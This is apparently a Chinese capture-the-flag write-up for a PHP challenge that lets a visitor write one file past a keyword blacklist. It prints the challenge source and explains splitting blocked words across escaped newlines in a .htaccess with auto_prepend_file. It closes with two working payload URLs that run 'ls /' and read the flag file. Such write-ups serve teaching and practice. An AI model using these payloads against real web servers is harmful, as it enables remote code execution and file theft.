0x00
官方源码
0x01
环境搭建好后,访问发现源码.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34
|
$files = scandir('./'); foreach($files as $file) { if(is_file($file)){ if ($file !== "index.php") { unlink($file); } } } include_once("fl3g.php"); if(!isset($_GET['content']) || !isset($_GET['filename'])) { highlight_file(__FILE__); die(); } $content = $_GET['content']; if(stristr($content,'on') || stristr($content,'html') || stristr($content,'type') || stristr($content,'flag') || stristr($content,'upload') || stristr($content,'file')) { echo "Hacker"; die(); } $filename = $_GET['filename']; if(preg_match("/[^a-z.]/", $filename) == 1) { echo "Hacker"; die(); } $files = scandir('./'); foreach($files as $file) { if(is_file($file)){ if ($file !== "index.php") { unlink($file); } } } file_put_contents($filename, $content . "nJust one chance"); ?>
|
大致分析源码,可以想到通过写.htaccess来执行命令.黑名单可已通过
绕过
并且注意到最后填加了nJust one chance
,我们只要自己加上一个
转义后面的换行,就不会500了.
0x02
payload:
1 2
|
/?filename=.htaccess&content=php_value%20auto_prepend_fi%0Ale%20".htaccess"%0A%23<?php%20system(%27ls%20/%27);?>%0A%23%20 /?filename=.htaccess&content=php_value%20auto_prepend_fi%0Ale%20".htaccess"%0A%23<?php%20system(%27cat /fl%0Aag%27);?>%0A%23%20
|
近期评论